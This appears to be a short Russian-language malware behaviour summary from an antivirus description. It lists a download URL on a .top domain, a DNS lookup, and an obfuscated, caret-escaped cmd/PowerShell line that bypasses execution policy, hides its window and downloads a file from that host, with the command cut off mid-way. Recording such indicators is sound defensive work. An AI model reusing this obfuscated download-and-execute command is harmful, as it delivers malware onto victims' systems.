Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWeRSh^e^ll^.^exe -E^XE^CUt^i^O^N^P^oli^CY ^BYp^AsS^ -^Nop^R^o^F^I^L^E^ ^-wInD^Ow^s^T^y^LE^ HiddE^N (N^EW-O^Bje^ct ^SYStEm.ne^t.we^bc^l^ienT^).Do^WnlOAd^Fil^e(^'http://zofelas...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "PoWeRSh^e^ll^.^exe -E^XE^CUt^i^O^N^P^oli^CY ^BYp^AsS^ -^Nop^R^o^F^I^L^E^ ^-wInD^Ow^s^T^y^LE^ HiddE^N (N^EW-O^Bje^ct ^SYStEm.ne^t.we^bc^l^ienT^).Do^WnlOAd^Fil^e(^'http://zofelas...' (со скрытым окном)